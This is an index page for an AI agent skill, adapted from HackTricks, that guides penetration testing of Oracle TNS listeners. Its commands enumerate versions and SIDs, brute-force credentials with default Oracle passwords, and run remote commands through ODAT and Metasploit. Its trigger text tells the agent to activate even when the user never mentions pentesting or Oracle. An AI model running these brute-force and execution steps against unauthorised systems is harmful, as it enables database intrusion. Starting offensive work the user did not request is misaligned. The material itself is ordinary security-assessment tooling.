OpenSkillIndex← back to search

Hacktricks-skills oracle-tns-pentest

Pentest Oracle TNS Listener on ports 1521-1529. Use this skill whenever the user mentions Oracle database, TNS listener, port 1521, Oracle enumeration, or needs to assess Oracle database security. This includes version detection, SID enumeration, credential testing, and vulnerability assessment. Trigger even if the user doesn't explicitly say "pentest" or "Oracle" but mentions database ports 1521-1529 or Oracle services.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/SKILL.MD
source content

Oracle TNS Listener Pentesting

A comprehensive skill for assessing Oracle database security through TNS Listener enumeration and exploitation.

When to Use This Skill

Use this skill when:

  • You need to enumerate or test Oracle database services
  • Port 1521 (or 1522-1529) is open on a target
  • The user mentions Oracle, TNS, or database enumeration
  • You're doing network service pentesting and Oracle is in scope
  • You need to discover Oracle SIDs, versions, or test credentials

Quick Start

# Basic enumeration
./scripts/oracle-nmap-scan.sh <target-ip>

# Full ODAT enumeration
./scripts/odat-wrapper.sh <target-ip>

# SID bruteforce
./scripts/sid-bruteforce.sh <target-ip> <wordlist>

Pentesting Workflow

1. Version Enumeration

Identify Oracle version to search for known vulnerabilities.

# Using nmap
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <target>

# Using ODAT
./odat all -s <target>

Why this matters: Different Oracle versions have different vulnerabilities. Version info helps you:

  • Search CVE databases for known exploits
  • Choose appropriate Metasploit modules
  • Determine if the version is end-of-life (more vulnerable)

2. TNS Listener Information

The TNS Listener is the entry point for Oracle connections. It typically runs on:

  • Primary: 1521/TCP
  • Secondary: 1522-1529/TCP
# Check all common Oracle ports
nmap -p 1521-1529 --script "oracle-tns-version" <target>

3. SID Name Enumeration

Discover database names (SID) that the listener serves.

# Using ODAT (recommended)
./odat sidenum -s <target> -d <wordlist>

# Using nmap
nmap --script "oracle-brute" --script-args userfile=users.txt,passfile=pass.txt -p 1521 <target>

Common default SIDs to try:

  • ORCL, ORCLDB, ORCL11G, ORCL12C, ORCL19C
  • XE, ORCLXE, ORCLXEPDB
  • TEST, PROD, DEV, DB
  • The hostname itself

4. Credential Bruteforce

Once you have a SID, attempt to authenticate.

# Using ODAT
./odat login -s <target> -S <sid> -u <username> -p <password>

# With wordlists
./odat login -s <target> -S <sid> -u users.txt -p pass.txt

Common default credentials:

  • system/manager
    , 
    system/system
  • sys/change_on_install
    , 
    sys/sys
  • scott/tiger
    , 
    scott/scott
  • sysdba/sysdba

5. Code Execution

If you gain access, attempt to execute code on the system.

# Using ODAT
./odat exec -s <target> -S <sid> -u <username> -p <password> -c "<command>"

# Using Metasploit (if installed)
msfconsole -q
use exploit/multi/oracle/<module>
set RHOSTS <target>
set SID <sid>
set USERNAME <username>
set PASSWORD <password>
exploit

Tools Reference

ODAT (Oracle Database Attack Tool)

The primary tool for Oracle pentesting.

Installation:

# Download from https://github.com/quentinhardy/odat/releases/
tar -xvf odat-linux-libc2.12-x86_64.tar.gz
cd odat-libc2.12-x86_64/
chmod +x odat-libc2.12-x86_64

Common commands:

CommandPurpose
odat all -s <target>
Full enumeration
odat sidenum -s <target> -d <wordlist>
SID bruteforce
odat login -s <target> -S <sid> -u <user> -p <pass>
Test credentials
odat exec -s <target> -S <sid> -u <user> -p <pass> -c "<cmd>"
Execute commands
odat tns -s <target>
TNS information

Nmap Scripts

# Version detection
nmap --script "oracle-tns-version" -p 1521 <target>

# Service detection
nmap -sV -p 1521 <target>

# Brute force (with wordlists)
nmap --script "oracle-brute" --script-args userfile=users.txt,passfile=pass.txt -p 1521 <target>

Metasploit Integration

If you have Metasploit installed, these modules are available:

  • auxiliary/scanner/oracle/oracle_enum
    - Enumerate Oracle services
  • auxiliary/scanner/oracle/oracle_listener
    - TNS listener enumeration
  • exploit/multi/oracle/oracle_exec
    - Command execution
  • exploit/multi/oracle/oracle_sqli
    - SQL injection

Requirements: See Oracle Pentesting Requirements

Safety and Ethics

Important: Only use these techniques on systems you have explicit authorization to test. Unauthorized access to databases is illegal.

Best practices:

  1. Get written authorization before testing
  2. Use rate limiting to avoid DoS
  3. Document all findings
  4. Report vulnerabilities responsibly
  5. Don't exfiltrate data during testing

References

Troubleshooting

Connection refused:

  • Verify the port is open: 
    nmap -p 1521 <target>
  • Check if Oracle is running on the target
  • Try secondary ports 1522-1529

TNS-12541: TNS:no listener:

  • The listener may not be running
  • Try different ports
  • Check firewall rules

TNS-12514: TNS:listener does not currently know of service:

  • The SID you're trying doesn't exist
  • Use SID enumeration to find valid SIDs

Authentication failed:

  • Try different credentials
  • Check if the account is locked
  • Verify the SID is correct